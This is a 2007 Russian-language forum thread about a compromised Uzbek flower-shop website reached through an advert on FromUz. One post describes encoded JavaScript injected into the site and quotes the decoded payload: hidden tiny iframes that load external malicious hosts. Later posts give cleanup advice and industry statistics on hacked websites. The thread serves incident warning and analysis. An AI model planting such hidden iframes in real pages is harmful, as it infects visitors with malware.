|
|
Знаете ли Вы, что ... | |
...инструкция по установке аватара описана в Правилах форума. | |
<< Предыдущий совет - Случайный совет - Следующий совет >> |
Инциденты Обсуждение произошедших инцидентов информационной безопасности |
Ответить |
|
Опции темы | Опции просмотра |
21.09.2007 11:36 | #1 | |||
Сам я не решился пройти по ссылке на FromUz`е, но вот что пишут пользователи этого форума:
Цитата:
Так что будьте осторожны... |
||||
|
Ответить |
21.09.2007 13:52 | #2 |
Сообщений: 967
+ 184
236/143
– 1
1/1
|
Спасибо за информацию. На самом деле с FromUz ничего не произошло. Угрозу представляет веб-сайт hттp://www.FlowerShop.uz, на который ссылается рекламная ссылка "найдем и поздравим наших учителей" размещенная на FromUz.
При открытии веб-сайта hттp://www.FlowerShop.uz срабатывает вредоносная ссылка размещенная в index файле между тегами <!-- start get_javascript вредоносная ссылка <!-- end get_javascript(applicationtop2header) //--> После раскодирования зашифрованного текста, получаем следующую ссылку - hттp://977398530/?2954196ea44dc2a0 Веб-сайт, расположенный по данной ссылке содержит следующий вредоносный код: Код:
<iframe src='http://malasha.com' width='6' height='6' style='visibility: hidden;'></iframe> <iframe src='http://977398531/s' width='6' height='6' style='visibility: hidden;'></iframe> Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 16:30. |
|
Ответить |
4 "+" от:
|
21.09.2007 16:47 | #4 |
Сообщений: 4,884
+ 433
2,393/1,396
– 12
37/21
|
К сожалению простое удаление может оказаться неэффективным. Сканирование рабочих станций на вредоносное ПО, смена паролей и пр. Бот, записывающий код в исходники может работать циклично. Наверное, подробно Вам описывать не нужно.
|
|
Ответить |
21.09.2007 20:29 | #5 |
ЕС
|
Хотелось бы узнать - это массовая атака на Узнет или просто раньше не обращали внимания на это?
И что делает вирус на зараженном компьютере?
__________________
ZiyoNet.uz - Образовательный портал с элементами соцсети. |
|
Ответить |
22.09.2007 12:03 | #6 |
Сообщений: 967
+ 184
236/143
– 1
1/1
|
Массовой атаки на узнет замечено не было. На сегодняшний день по статистике различных экспертов по информационной безопасности во всем мире на первых местах стоит как раз угроза внедрения вредоносного кода на веб-сайты. В основном это делается для того, чтобы воровать идентификационные данные пользователей и вовлекать их компьютеры в различные бот-сети. Данный вид угрозы широко распространен практически во всех странах. Узбекистан не исключение. Если в прошлом году мы могли наблюдать единичные случаи внедрения вредоносного кода на сайты, то в этом году это уже становится действительно серьезной проблемой.
|
|
Ответить |
"+" от:
|
22.09.2007 12:53 | #8 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
Примерно один из десяти веб-сайтов, проиндексированных крупнейшей поисковой системой Google, содержит троянский код, способный заразить компьютер посетителя. К такому выводу пришел исследователь Google Нильс Провос, проведший с коллегами анализ 4,5 миллиона веб-страниц.
На 450 тысячах сайтах был обнаружен код, загружающий различные вредоносные или шпионские программы. Еще на 700 тысячах исследователи обнаружили код, который потенциально может нарушить безопасность системы. "Для того чтобы заставить пользователя установить вредоносный код, используется социальная инженерия, - пишет Нильс Провос в докладе "Призрак в браузере". - Пользователю предоставляются ссылки, на которых обещают "интересные" страницы с откровенным порнографическим контентом, пиратским ПО или музыкой и видео. Типичный пример таких сайтов - галерея уменьшенных изображений со ссылками якобы на взрослые видеоклипы". Вредоносный код нередко попадает и на легальные веб-страницы. Исследователи обнаружили его в баннерах и виджетах. С развитием Web 2.0 и сайтов с контентом, составленным самими пользователями, проникновение на компьютеры через веб-страницы становится новым привлекательным вектором атаки. Еще один способ - взлом легальных веб-сайтов и внедрение в страницы вредоносного кода. Посещая доверенный сайт, пользователь может не обращать внимания на предупреждения об опасности или понизить уровень защиты заранее. В ходе исследования авторы доклада заразили свои компьютеры 50 различными видами вредоносного кода, посещая легальные веб-страницы, "угнанные" хакерами. |
||
|
Ответить |
"+" от:
|
22.09.2007 13:00 | #9 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
В отчете компании Sophos говорится, что на сегодняшний день в Сети появляется около 30 тысяч новых вредоносных веб-сайтов, вместо 5000 в день в апреле, т.е. можно сказать, их количество увеличивается в геометрической прогрессии. Столь устрашающую тенденцию Sophos объясняет двумя причинами.
Хакеры все чаще переключаются с e-mail в качестве предпочтительного метода распространения вредоносного ПО на веб-сайты, причем чаще всего взламывают легитимные сайты и помещают на них вредоносное ПО. 80% — это взломанные легитимные сайты. Другая причина столь резкого скачка числа вредоносных сайтов - их просто стали лучше искать... |
||
|
Ответить |
"+" от:
|
|